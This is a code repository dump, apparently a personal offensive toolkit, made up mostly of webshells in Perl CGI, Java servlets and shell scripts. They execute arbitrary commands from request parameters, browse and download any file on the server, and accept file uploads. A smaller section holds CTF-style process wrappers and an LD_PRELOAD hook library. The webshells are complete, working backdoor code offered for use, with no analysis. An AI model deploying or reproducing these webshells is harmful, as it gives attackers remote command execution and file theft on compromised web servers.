20 | 21 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /webshell/pl-cgi/cmd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # cmd.pl: Run commands on a webserver 6 | 7 | use strict; 8 | 9 | my ($cmd, %FORM); 10 | 11 | $|=1; 12 | 13 | print "Content-Type: text/html\r\n"; 14 | print "\r\n"; 15 | 16 | # Get parameters 17 | 18 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 19 | 20 | if(defined $FORM{'cmd'}) { 21 | $cmd = $FORM{'cmd'}; 22 | } 23 | 24 | print ' 25 | 26 |
27 | 28 | 29 |
30 |
';
31 | 
32 | if(defined $FORM{'cmd'}) {
33 |   print "Results of '$cmd' execution:\n\n";
34 |   print "-"x80;
35 |   print "\n";
36 | 
37 |   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
38 | 
39 |   while() {
40 |     print;
41 |   }
42 | 
43 |   close(CMD);
44 |   print "-"x80;
45 |   print "\n";
46 | }
47 | 
48 | print "
"; 49 | 50 | sub parse_parameters ($) { 51 | my %ret; 52 | 53 | my $input = shift; 54 | 55 | foreach my $pair (split('&', $input)) { 56 | my ($var, $value) = split('=', $pair, 2); 57 | 58 | if($var) { 59 | $value =~ s/\+/ /g ; 60 | $value =~ s/%(..)/pack('c',hex($1))/eg; 61 | 62 | $ret{$var} = $value; 63 | } 64 | } 65 | 66 | return %ret; 67 | } 68 | -------------------------------------------------------------------------------- /webshell/pl-cgi/list.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # browse.pl: Browse and download files from a webserver 6 | 7 | use strict; 8 | 9 | my ($path, %FORM); 10 | 11 | $|=1; 12 | 13 | 14 | # Get parameters 15 | 16 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 17 | 18 | if(defined $FORM{'path'}) { 19 | $path = $FORM{'path'}; 20 | 21 | 22 | } else { 23 | $path = "/"; 24 | } 25 | 26 | if(-f $path) { # Download selected file 27 | print "Content-Type: application/octet-stream\r\n"; 28 | print "\r\n"; 29 | open(FILE, "< $path") || print "Could not open file\n"; 30 | 31 | while() { 32 | print; 33 | } 34 | 35 | close(FILE); 36 | exit; 37 | } 38 | 39 | print "Content-Type: text/html\r\n"; 40 | print "\r\n"; 41 | 42 | print ' 43 | 44 |
45 | 46 | 47 |
48 | Directory ' . $path . ' contents: 49 |

50 | 51 | '; 52 | 53 | if(defined $FORM{'path'}) { 54 | 55 | opendir(DIR, $path) || print "Could not open directory"; 56 | 57 | foreach (sort(readdir(DIR))) { 58 | print get_fileinfo($path, $_). "\n"; 59 | } 60 | 61 | closedir(DIR); 62 | 63 | } 64 | 65 | print "
"; 66 | 67 | sub parse_parameters ($) { 68 | my %ret; 69 | 70 | my $input = shift; 71 | 72 | foreach my $pair (split('&', $input)) { 73 | my ($var, $value) = split('=', $pair, 2); 74 | 75 | if($var) { 76 | $value =~ s/\+/ /g ; 77 | $value =~ s/%(..)/pack('c',hex($1))/eg; 78 | 79 | $ret{$var} = $value; 80 | } 81 | } 82 | 83 | return %ret; 84 | } 85 | 86 | sub get_fileinfo ($$) { 87 | my $ret; 88 | 89 | my ($dir,$filename) = @_; 90 | my $file = $dir . "/" . $filename; 91 | 92 | $file=~s/\/+/\//g; 93 | 94 | $ret = ""; 95 | 96 | $ret .= ""; 97 | 98 | if(-d $file) { 99 | $file=~s/\/[^\/]+\/\.\./\//g; 100 | $ret .= "$filename"; 101 | } else { 102 | $ret .= "$filename [D]" ; 103 | } 104 | $ret .= ""; 105 | 106 | my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file); 107 | 108 | $ret .= " "; 109 | $ret .= "$size"; 110 | $ret .= "". getpwuid($uid) .""; 111 | $ret .= "". getgrgid($gid) .""; 112 | 113 | $ret .= ""; 114 | 115 | return $ret; 116 | } 117 | -------------------------------------------------------------------------------- /webshell/servlet/CmdServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * CmdServlet.java 20/01/2004 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class CmdServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | 18 | PrintWriter out = res.getWriter(); 19 | out.print(""); 20 | out.print("


"); 21 | out.print(""); 22 | out.print(""); 23 | out.print("
"); 24 | 25 | if(req.getParameter("cmd") != null) { 26 | out.print("\n

Command: " + req.getParameter("cmd") + "\n


\n");
27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | 			int c='\0';
30 |         	while ((c=procIn.read()) != -1) {
31 | 				out.print((char)c);
32 | 				}
33 | 	        }
34 | 
35 | 		out.print("\n
"); 36 | out.print(""); 37 | } 38 | 39 | public String getServletInfo() { 40 | return "CmdServlet 0.1"; 41 | } 42 | 43 | } 44 | -------------------------------------------------------------------------------- /webshell/servlet/ListServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * ListServlet.java 3 | * 4 | * @author Sierra 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.ServletException; 10 | import javax.servlet.http.*; 11 | 12 | public class ListServlet extends HttpServlet 13 | { 14 | 15 | 16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 17 | PrintWriter printwriter = res.getWriter(); 18 | String path = req.getParameter("file"); 19 | 20 | printwriter.write("\n\nDirectory Listing\n\n\n"); 21 | printwriter.write("\n"); 22 | if(req.getParameter("file")==null) path = "c:\\"; 23 | printwriter.write("

Path: " + path + "


\n");
24 | 
25 | 		File file = new File(path);
26 | 
27 | 		if(file.isDirectory())
28 | 		{
29 | 			String s = new String("Unknown");
30 | 			String s2 = new String("Black");
31 | 			File afile[] = file.listFiles();
32 | 			for(int i = 0; i < afile.length; i++)
33 | 			{
34 | 				String s1 = new String(afile[i].toString());
35 | 				printwriter.write("(");
36 | 				String s3;
37 | 				if(afile[i].isDirectory())
38 | 				{
39 | 					printwriter.write("d");
40 | 					s1 = s1 + "/";
41 | 					s3 = new String("Blue");
42 | 				} else
43 | 				if(afile[i].isFile())
44 | 				{
45 | 					printwriter.write("-");
46 | 					s3 = new String("Green");
47 | 				} else
48 | 				{
49 | 					printwriter.write("?");
50 | 					s3 = new String("Red");
51 | 				}
52 | 				if(afile[i].canRead())
53 | 					printwriter.write("r");
54 | 				else
55 | 					printwriter.write("-");
56 | 				if(afile[i].canWrite())
57 | 					printwriter.write("w");
58 | 				else
59 | 					printwriter.write("-");
60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
\n"); 61 | } 62 | 63 | printwriter.write("
"); 64 | } else 65 | if(file.canRead()) 66 | { 67 | FileInputStream fileinputstream = new FileInputStream(file); 68 | int j = 0; 69 | while(j >= 0) 70 | { 71 | j = fileinputstream.read(); 72 | printwriter.write(j); 73 | } 74 | fileinputstream.close(); 75 | } else 76 | { 77 | printwriter.write("Can't Read file
"); 78 | } 79 | 80 | } 81 | 82 | 83 | public String getServletInfo() { 84 | return "Directory Listing"; 85 | } 86 | } -------------------------------------------------------------------------------- /webshell/servlet/UpServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * UpServlet.java 29/04/2005 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class UpServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | PrintWriter out = res.getWriter(); 18 | out.print(""); 19 | out.print("
"); 20 | out.print("UPLOAD "); 21 | out.print(""); 22 | out.print("
"); 23 | out.print(""); 24 | } 25 | 26 | 27 | public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 28 | String tag = new String(); 29 | int c = '\0'; 30 | int contador = 0; 31 | ServletInputStream in = req.getInputStream(); 32 | DataInputStream post = new DataInputStream(in); 33 | 34 | PrintWriter out = res.getWriter(); 35 | res.setContentType("text/html"); 36 | out.print("
");
37 | 
38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | 			tag=tag.concat("" + (char)c);
40 | 			contador++;
41 | 			}
42 | 
43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 | 
45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 | 
48 | 		// (!) Uploaded File Name
49 | 
50 | 		File newfile = new File("c:\\install.log");
51 | 
52 | 		/////////////////////////
53 | 
54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
55 | 
56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | 			c=post.read();
58 | 			fileout.write((char)c);
59 | 			}
60 | 
61 | 		fileout.close();
62 | 		out.print("<== OK");
63 | 
64 |     }
65 | 
66 | 
67 |     public String getServletInfo() {
68 | 		return "UpServlet 0.1";
69 |     }
70 | 
71 | }


--------------------------------------------------------------------------------
/webshell/sh/cmd.sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/sh/cmd.sh


--------------------------------------------------------------------------------
/webshell/sh/list.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | #
 3 | # SH_KIT
 4 | #
 5 | # list.sh = Directory & File Listing
 6 | #
 7 | # by: The Dark Raver
 8 | # modified: 16/12/2005
 9 | #
10 | 
11 | echo Content-Type: text/html
12 | echo
13 | 
14 | if [ "$QUERY_STRING" != "" ]
15 |   then
16 |   echo PATH: $QUERY_STRING "

" 17 | echo `ls $QUERY_STRING` > /tmp/test 18 | else 19 | echo PATH: / "

" 20 | echo > /tmp/test 21 | QUERY_STRING="/" 22 | root="1" 23 | fi 24 | 25 | out=`grep "/" /tmp/test` 26 | 27 | if [ "$out" != "" ] 28 | then 29 | echo FICHERO: $QUERY_STRING 30 | echo "
"
31 |     cat $QUERY_STRING
32 |   else
33 |     if [ "$root" != "1" ]
34 |       then
35 |       echo "( ) ".."
" 36 | fi 37 | for i in `ls $QUERY_STRING` 38 | do 39 | if [ "$root" == "1" ] 40 | then 41 | echo "( ) "$i"
" 42 | else 43 | echo "( ) "$i"
" 44 | fi 45 | done 46 | 47 | fi -------------------------------------------------------------------------------- /webshell/sh/up.sh: -------------------------------------------------------------------------------- 1 | echo Content-Type: text/html 2 | echo 3 | echo "" 4 | echo "
" 5 | echo "

Local File: " 6 | echo "" 7 | echo "




" 8 | echo "
" 9 | dd count=$CONTENT_LENGTH bs=1 of=/tmp/test 10 | lineas=`cat /tmp/test | wc -l` 11 | lineas2=`expr $lineas - 4` 12 | lineas3=`expr $lineas2 - 1` 13 | tail -$lineas2 /tmp/test > /tmp/test2 14 | head -$lineas3 /tmp/test2 > /tmp/upload 15 | echo "
"
16 | cat /tmp/upload
17 | echo "
" 18 | 19 | -------------------------------------------------------------------------------- /wrapper/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | @echo "\tmake hookall" 3 | @echo "\tmake hook64" 4 | @echo "\tmake hook32" 5 | @echo "\tmake pipe" 6 | @echo "\tmake socket" 7 | 8 | hookall: hook64 hook32 9 | 10 | hook64: hook.c mdir 11 | gcc -fPIC -shared -o bin/hook.so hook.c -ldl 12 | hook32: hook.c mdir 13 | gcc -m32 -fPIC -shared -o hook.so.32 hook.c -ldl 14 | pipe: mdir 15 | gcc wrapper_pipe.c -o bin/wrapper_pipe 16 | socket: mdir 17 | gcc wrapper_socket.c -o wrapper_socket 18 | mdir: 19 | mkdir bin -------------------------------------------------------------------------------- /wrapper/hook.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void free(void *ptr) 4 | { 5 | void *lib = dlopen("/lib/x86_64-linux-gnu/libc.so.6", RTLD_LAZY); 6 | void (*_free)(); 7 | 8 | _free = (void(*)()) dlsym(lib, "free"); 9 | dlclose(lib); 10 | 11 | _free(ptr); 12 | 13 | } 14 | 15 | int puts(const char *s) 16 | { 17 | void *lib = dlopen("/lib/x86_64-linux-gnu/libc.so.6", RTLD_LAZY); 18 | int (*_puts)(const char*); 19 | 20 | _puts = (int(*)()) dlsym(lib, "puts"); 21 | dlclose(lib); 22 | return _puts(s); 23 | } 24 | -------------------------------------------------------------------------------- /wrapper/wrapper_pipe.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUFSIZE 1000 7 | 8 | char *buf; 9 | 10 | void quit() 11 | { 12 | exit(0); 13 | } 14 | 15 | void timeout() 16 | { 17 | printf("Times Up!\n"); 18 | fflush(stdout); 19 | exit(0); 20 | } 21 | 22 | int main(int argc, char *argv[]) 23 | { 24 | int p1[2]; 25 | int p2[2]; 26 | int pid; 27 | 28 | buf = (char*) malloc(BUFSIZE); 29 | int n; 30 | 31 | if( argc < 2 ){ 32 | fprintf(stderr, "There is no argv\n"); 33 | 
exit(0); 34 | } 35 | 36 | char exe[50]; 37 | sprintf(exe,"./%s",argv[1]); 38 | 39 | fprintf(stdout, "pwn: %s\n",exe); 40 | 41 | pipe(p1); 42 | pipe(p2); 43 | pid = fork(); 44 | 45 | if (pid){ //parent 46 | signal(SIGCHLD, quit); 47 | signal(SIGALRM, timeout); 48 | alarm(10); 49 | 50 | close(p1[0]); 51 | close(p2[1]); 52 | 53 | // get 54 | n = read(p2[0], buf, BUFSIZE); 55 | write(1, buf, n); 56 | 57 | while (1) { 58 | // hijack input 59 | n = read(0, buf, BUFSIZE); 60 | if (strstr(buf, "flag")) { // filter 61 | fprintf(stderr, "pwn?\n"); 62 | exit(0); 63 | } 64 | 65 | write(p1[1], buf, n); 66 | bzero(buf, BUFSIZE); 67 | 68 | // hijack output 69 | n = read(p2[0], buf, BUFSIZE); 70 | write(1, buf, n); 71 | } 72 | 73 | } else { //child 74 | close(p1[1]); 75 | close(p2[0]); 76 | dup2(p1[0], 0); 77 | dup2(p2[1], 1); 78 | execve(exe, NULL, NULL); 79 | } 80 | 81 | return 0; 82 | } 83 | -------------------------------------------------------------------------------- /wrapper/wrapper_socket.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define BUFSIZE 1000 10 | #define SOCK_PATH "/tmp/wrapper" 11 | 12 | char *buf; 13 | 14 | void quit() 15 | { 16 | exit(0); 17 | } 18 | 19 | void timeout() 20 | { 21 | printf("Times Up!\n"); 22 | fflush(stdout); 23 | exit(0); 24 | } 25 | 26 | int main() 27 | { 28 | 29 | int pid; 30 | 31 | buf = (char*) malloc(BUFSIZE); 32 | int n; 33 | 34 | unlink(SOCK_PATH); 35 | int s = socket(AF_UNIX, SOCK_STREAM, 0); 36 | struct sockaddr_un addr; 37 | memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH)); 38 | addr.sun_family = AF_UNIX; 39 | bind(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family)); 40 | listen(s, 5); 41 | 42 | pid = fork(); 43 | 44 | if (pid){ //parent 45 | signal(SIGCHLD, quit); 46 | signal(SIGALRM, timeout); 47 | alarm(10); 48 | 49 | struct sockaddr_un child; 50 | int clen = 
sizeof(child); 51 | int cs = accept(s, (struct sockaddr *) &child, &clen); 52 | 53 | if (cs == -1) { 54 | fprintf(stderr, "server socket fail\n"); 55 | exit(0); 56 | } 57 | 58 | // get 59 | n = read(cs, buf, BUFSIZE); 60 | write(1, buf, n); 61 | 62 | while (1) { 63 | // hijack input 64 | n = read(0, buf, BUFSIZE); 65 | if (strstr(buf, "flag")) { // filter 66 | fprintf(stderr, "pwn?\n"); 67 | exit(0); 68 | } 69 | 70 | write(cs, buf, n); 71 | bzero(buf, BUFSIZE); 72 | 73 | // hijack output 74 | n = read(cs, buf, BUFSIZE); 75 | write(1, buf, n); 76 | } 77 | 78 | } else { //child 79 | int s = socket(AF_UNIX, SOCK_STREAM, 0); 80 | struct sockaddr_un addr; 81 | bzero(addr.sun_path, sizeof(addr.sun_path)); 82 | memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH)); 83 | addr.sun_family = AF_UNIX; 84 | connect(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family)); 85 | if (s == -1) { 86 | fprintf(stderr, "cli socket fail\n"); 87 | exit(0); 88 | } 89 | dup2(s, 0); 90 | dup2(s, 1); 91 | execve("./applestore", NULL, NULL); 92 | } 93 | 94 | return 0; 95 | } 96 | --------------------------------------------------------------------------------
